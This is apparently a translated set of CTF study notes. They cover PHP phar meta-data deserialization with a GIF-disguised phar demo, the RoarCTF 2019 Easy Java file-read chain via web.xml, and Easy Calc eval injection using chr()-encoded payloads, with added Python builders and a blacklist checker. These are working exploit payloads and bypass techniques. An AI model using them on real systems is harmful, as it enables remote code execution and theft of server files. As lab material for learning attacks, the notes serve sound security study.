The stub can be thought of as a marker; its format is xxx<?php xxx; __HALT_COMPILER();?>. The leading content is not restricted (which is what allows a phar to be disguised as another file type), but it must end with __HALT_COMPILER();?>, otherwise the phar extension will not recognize the file as a phar.
0x01 A manifest describing the contents
A phar file is essentially an archive, and the manifest records the permissions, attributes and other information of every file it contains. The manifest also stores user-defined meta-data in serialize() format, which is the core of the attacks described above: when PHP parses the manifest, this meta-data is passed to unserialize(). (From PHP 8.0 on, the meta-data is only unserialized when getMetadata() is explicitly called, so the automatic trigger does not apply on current versions.)
0x02 The file contents
The contents of the archived files.
0x03 A signature for verifying phar integrity
Phar file format only. The signature covers everything that precedes it in the file; with phar.require_hash = On (the default) a phar whose signature is missing or invalid will not be loaded.
Demo
Construct a phar file following the structure above; PHP provides the built-in Phar class for the related operations.
Set the phar.readonly option in php.ini to Off, otherwise the phar file cannot be generated.
<?php
// class whose instance is stored as meta-data; the property is set below
class file {
    public $output;
}

@unlink("phar.phar");
$phar = new Phar("phar.phar");            // suffix must be .phar
$phar->startBuffering();
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); // set stub and disguise the file as a GIF
$o = new file();
$o->output = "phpinfo();";
$phar->setMetadata($o);                   // custom meta-data, stored serialized in the manifest
$phar->addFromString("test.txt", "test"); // the archived file
$phar->stopBuffering();                   // the signature is computed automatically
(unfinished)
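To make the layout above concrete, here is an added example (not code from the original write-up, and not PHP's own implementation) that writes a minimal phar in the phar file format and parses it back, locating the serialized meta-data in the manifest and checking the SHA-1 signature. The field order follows the format description above; the META string is the serialize() form of the demo object, and the has_serialized_object() heuristic is an assumption of what an upload scanner might look for.

```python
"""Build and parse a minimal phar (phar file format): stub, manifest,
file contents, signature. Added example; META is the serialize() output
of the demo object (class file, property output = "phpinfo();")."""
import hashlib
import re
import struct
import zlib

HALT = b"__HALT_COMPILER();"
FLAG_SIGNED = 0x00010000   # global manifest flag: a signature is present
SIG_SHA1 = 0x0002          # signature type flag for SHA-1
API_VERSION = b"\x11\x00"  # manifest API version 1.1.0
META = b'O:4:"file":1:{s:6:"output";s:10:"phpinfo();";}'


def build_phar(stub_prefix, metadata, files):
    """Return phar bytes: stub + manifest + uncompressed files + SHA-1 signature.

    stub_prefix: bytes placed before __HALT_COMPILER(); (e.g. a fake GIF header)
    metadata:    a PHP serialize() string, stored in the global manifest
    files:       dict of name -> content (bytes)
    """
    stub = stub_prefix + HALT + b" ?>\r\n"   # same trailer Phar::setStub() writes
    entries = b""
    contents = b""
    for name, data in files.items():
        entries += struct.pack("<I", len(name)) + name
        # uncompressed size, timestamp, compressed size, CRC32, flags (perms), meta length
        entries += struct.pack("<IIIIII", len(data), 0, len(data),
                               zlib.crc32(data) & 0xFFFFFFFF, 0o644, 0)
        contents += data
    body = struct.pack("<I", len(files)) + API_VERSION + struct.pack("<I", FLAG_SIGNED)
    body += struct.pack("<I", 0)                          # no alias
    body += struct.pack("<I", len(metadata)) + metadata   # the unserialize() sink
    body += entries
    unsigned = stub + struct.pack("<I", len(body)) + body + contents
    sig = hashlib.sha1(unsigned).digest()                 # covers everything before it
    return unsigned + sig + struct.pack("<I", SIG_SHA1) + b"GBMB"


def _u32(data, pos):
    return struct.unpack_from("<I", data, pos)[0], pos + 4


def parse_phar(data):
    """Parse phar bytes; return the manifest meta-data, files and signature status."""
    pos = data.index(HALT) + len(HALT)
    for tail in (b" ?>\r\n", b" ?>\n", b" ?>", b"\r\n", b"\n"):  # optional stub trailer
        if data.startswith(tail, pos):
            pos += len(tail)
            break
    manifest_len, pos = _u32(data, pos)
    manifest_end = pos + manifest_len
    nfiles, pos = _u32(data, pos)
    pos += 2                                   # API version
    flags, pos = _u32(data, pos)
    alias_len, pos = _u32(data, pos)
    pos += alias_len
    meta_len, pos = _u32(data, pos)
    metadata = data[pos:pos + meta_len]
    pos += meta_len
    entries = []
    for _ in range(nfiles):
        name_len, pos = _u32(data, pos)
        name = data[pos:pos + name_len]
        pos += name_len
        _usize, _ts, csize, crc, _fflags, fmeta_len = struct.unpack_from("<IIIIII", data, pos)
        pos += 24 + fmeta_len
        entries.append((name, csize, crc))
    if pos != manifest_end:
        raise ValueError("manifest length does not match its contents")
    files = []
    for name, csize, crc in entries:           # contents follow the manifest in order
        content = data[pos:pos + csize]
        pos += csize
        files.append((name, content, zlib.crc32(content) & 0xFFFFFFFF == crc))
    sig_ok = None
    if flags & FLAG_SIGNED and data.endswith(b"GBMB"):
        sig_type, _ = _u32(data, len(data) - 8)
        if sig_type == SIG_SHA1:
            sig_ok = hashlib.sha1(data[:-28]).digest() == data[-28:-8]
    return {"metadata": metadata, "files": files, "signature_ok": sig_ok}


def has_serialized_object(metadata):
    """Scanner heuristic (assumption): manifest meta-data containing a PHP object O:len:"Class"."""
    return re.search(rb'(?:^|[;{])O:\d+:"', metadata) is not None


if __name__ == "__main__":
    phar = build_phar(b"GIF89a<?php ", META, {b"test.txt": b"test"})
    print(parse_phar(phar))
```

The parser walks the file exactly as the format section describes: stub up to the halt trailer, a length-prefixed manifest whose global meta-data field is the unserialize() sink, then the file bodies, then the signature block ending in GBMB. Flipping a byte in the stub of the generated file makes signature_ok come back False, which is what phar.require_hash relies on.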
[RoarCTF 2019]Easy Java
Clicking "help" redirects to /Download?filename=help.docx; the filename parameter has an arbitrary file read vulnerability.
java.io.FileNotFoundException:{help.docx} // echoed on the page: the read fails with GET, so change the request method to POST
filename=/WEB-INF/web.xml
... // sensitive information
<servlet>
    <servlet-name>FlagController</servlet-name>
    <servlet-class>com.wm.ctf.FlagController</servlet-class>
</servlet>
<servlet-mapping>
    <servlet-name>FlagController</servlet-name>
    <url-pattern>/Flag</url-pattern>
</servlet-mapping>
...
A brief note on servlet url-pattern matching
In the configuration above, <servlet> first declares a servlet, giving its name and the class that implements it.
<servlet-mapping> declares the matching rules for that servlet; each <url-pattern> is one matching rule.
When a browser sends a request and it reaches the servlet container, the container first removes the application's context path from the request URL; the remainder is the servlet mapping URL, which is matched against the <url-pattern> rules to pick the servlet.
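The matching described above, as an added example (not code from the write-up and not a container's own implementation): it parses a web.xml, strips the context path, applies the servlet specification's matching order (exact match, longest path-prefix match, extension match, default servlet) and derives the class file path under /WEB-INF/classes/ that the file read would then fetch. The WEB_XML sample is constructed around the FlagController fragment shown above; the ApiServlet, ActionServlet and default entries are hypothetical additions that exercise the other rules.

```python
"""Resolve a request path to its servlet class via web.xml, then derive the
.class path under /WEB-INF/classes/. Added example; WEB_XML is constructed
(only the FlagController entries come from the write-up)."""
import xml.etree.ElementTree as ET

WEB_XML = """<web-app>
<servlet><servlet-name>FlagController</servlet-name><servlet-class>com.wm.ctf.FlagController</servlet-class></servlet>
<servlet-mapping><servlet-name>FlagController</servlet-name><url-pattern>/Flag</url-pattern></servlet-mapping>
<servlet><servlet-name>ApiServlet</servlet-name><servlet-class>com.example.ApiServlet</servlet-class></servlet>
<servlet-mapping><servlet-name>ApiServlet</servlet-name><url-pattern>/api/*</url-pattern></servlet-mapping>
<servlet><servlet-name>ActionServlet</servlet-name><servlet-class>com.example.ActionServlet</servlet-class></servlet>
<servlet-mapping><servlet-name>ActionServlet</servlet-name><url-pattern>*.do</url-pattern></servlet-mapping>
<servlet><servlet-name>default</servlet-name><servlet-class>com.example.DefaultServlet</servlet-class></servlet>
<servlet-mapping><servlet-name>default</servlet-name><url-pattern>/</url-pattern></servlet-mapping>
</web-app>"""


def _local(tag):
    return tag.rsplit("}", 1)[-1]          # drop an XML namespace prefix if present


def load_mappings(web_xml):
    """Return ({servlet-name: class}, [(url-pattern, servlet-name), ...])."""
    classes, patterns = {}, []
    for el in ET.fromstring(web_xml):
        fields = {_local(c.tag): (c.text or "").strip() for c in el}
        if _local(el.tag) == "servlet":
            classes[fields["servlet-name"]] = fields["servlet-class"]
        elif _local(el.tag) == "servlet-mapping":
            for c in el:                   # a mapping may list several url-patterns
                if _local(c.tag) == "url-pattern":
                    patterns.append((c.text.strip(), fields["servlet-name"]))
    return classes, patterns


def match_servlet(patterns, path):
    """Servlet spec order: exact, longest path prefix (/x/*), extension (*.ext), default (/)."""
    by_pattern = dict(patterns)
    if path in by_pattern:                 # 1. exact match
        return by_pattern[path]
    best = None
    for pattern, name in patterns:         # 2. longest path-prefix match
        if pattern.endswith("/*"):
            prefix = pattern[:-2]
            if path == prefix or path.startswith(prefix + "/"):
                if best is None or len(prefix) > len(best[0]):
                    best = (prefix, name)
    if best:
        return best[1]
    last = path.rsplit("/", 1)[-1]
    if "." in last:                        # 3. extension match on the last segment
        ext_pattern = "*." + last.rsplit(".", 1)[-1]
        if ext_pattern in by_pattern:
            return by_pattern[ext_pattern]
    return by_pattern.get("/")             # 4. default servlet


def resolve(web_xml, request_uri, context_path=""):
    """Strip the context path as the container does, match, and derive the class file path."""
    path = request_uri
    if context_path and request_uri.startswith(context_path):
        path = request_uri[len(context_path):]
    classes, patterns = load_mappings(web_xml)
    name = match_servlet(patterns, path)
    cls = classes.get(name)
    class_file = "/WEB-INF/classes/" + cls.replace(".", "/") + ".class" if cls else None
    return name, cls, class_file


if __name__ == "__main__":
    print(resolve(WEB_XML, "/Flag"))
```

resolve(WEB_XML, "/Flag") returns the FlagController name, the class com.wm.ctf.FlagController and the path /WEB-INF/classes/com/wm/ctf/FlagController.class, which is the next filename to request through the file read.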
filename=/WEB-INF/classes/com/wm/ctf/FlagController.class
Download the class file and decompile it
import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

@WebServlet(name = "FlagController")
public class FlagController extends HttpServlet {
    // base64-encoded flag, hard-coded in the class
    String flag = "ZmxhZ3s1ZTNhNzBjMS0xNzk2LTRmNmQtODUyOC05ZmE1MzYzOGNhZTV9Cg==";

    protected void doGet(HttpServletRequest paramHttpServletRequest, HttpServletResponse paramHttpServletResponse)
            throws ServletException, IOException {
        PrintWriter printWriter = paramHttpServletResponse.getWriter();
        printWriter.print("<h1>Flag is nearby ~ Come on! ! !</h1>");
    }
}
What is WEB-INF, and its important directories and files
WEB-INF is the protected directory of a Java web application: "protected" means clients cannot request it directly; only server-side code can access it.
/WEB-INF/web.xml
The web application's configuration file; it describes the servlets and other application components, their configuration and naming rules.
/WEB-INF/classes/
Contains all class files used by the site, servlet and non-servlet classes alike, that are not packaged into .jar files.
/WEB-INF/lib/
Holds the JAR files the web application needs.
/WEB-INF/src/
Source directory; the .java files are laid out following the package structure.
/WEB-INF/database.properties
Database configuration file.
[RoarCTF 2019]Easy Calc (unfinished)
$('#calc').submit(function(){
    $.ajax({
        url: "calc.php?num=" + encodeURIComponent($("#content").val()),
        type: 'GET',
        success: function(data){
            $("#result").html(`<div> <strong>Answer:</strong>${data} </div>`);
        },
        error: function(){
            alert("What is this? Can't compute it!");
        }
    })
    return false;
})
Visiting calc.php directly returns the backend source code
<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
    $str = $_GET['num'];
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $str)) {
            die("what are you want to do?");
        }
    }
    eval('echo '.$str.';');
}
?>
Commonly used characters that are filtered:
`$^[]'"%20 (space). Single quotes are filtered, so chr() is used instead of a string literal when building the payload.
/calc.php? num=1;var_dump(scandir(chr(47)));   // lists the root directory, which contains /f1agg
/calc.php? num=1;readfile(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103));
Helper to convert a path into its chr() form:
<?php
$payload = "/f1agg";
$parts = [];
foreach (str_split($payload) as $a) {
    $parts[] = "chr(" . ord($a) . ")";
}
echo implode(".", $parts); // chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)
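To check a payload before sending it, here is an added example (not code from the write-up) that emulates calc.php's blacklist and builds the chr()-encoded readfile payload. The BLACKLIST entries are the exact single-quoted PHP strings from the source above; php_pattern_compiles() reproduces how preg_match() looks for the closing '/' delimiter, which matters because the '\\' entry (a single backslash) produces the pattern /\/m with no closing delimiter, so PHP returns false for it and that entry never blocks anything.

```python
"""Emulate calc.php's blacklist and build a chr()-encoded payload that passes it.
Added example; BLACKLIST mirrors the PHP source, where single-quoted '\t' is
backslash+t (a regex tab) and '\\' is a single backslash."""
import re

BLACKLIST = [" ", r"\t", r"\r", r"\n", "'", '"', "`", r"\[", r"\]", r"\$", "\\", r"\^"]


def php_pattern_compiles(item):
    """preg_match('/' . item . '/m') needs an unescaped closing '/'.
    For the lone-backslash entry the pattern is '/\\/m': the slash is escaped,
    PHP warns 'No ending delimiter' (silenced by error_reporting(0)) and
    preg_match returns false, so that entry is dead."""
    body = item + "/m"
    i = 0
    while i < len(body):
        if body[i] == "\\":
            i += 2
            continue
        if body[i] == "/":
            return True
        i += 1
    return False


def is_blocked(num):
    """True if calc.php would die('what are you want to do?') for this num value."""
    for item in BLACKLIST:
        if not php_pattern_compiles(item):
            continue                       # PHP skips this entry with a warning
        if re.search(item, num, re.M):
            return True
    return False


def to_chr(s):
    """Encode a string as chr(n).chr(n)... so no quote characters are needed."""
    return ".".join(f"chr({ord(c)})" for c in s)


def readfile_payload(path):
    """num value that reads a file; eval('echo '.$str.';') becomes echo 1;readfile(...);"""
    return "1;readfile(" + to_chr(path) + ")"


if __name__ == "__main__":
    p = readfile_payload("/f1agg")
    print(p, "blocked" if is_blocked(p) else "passes the blacklist")
```

is_blocked("1;readfile('/f1agg')") is True because of the quote, while readfile_payload("/f1agg") passes; the dead backslash entry means a value such as 1\2 also passes, even though the source appears to filter backslashes.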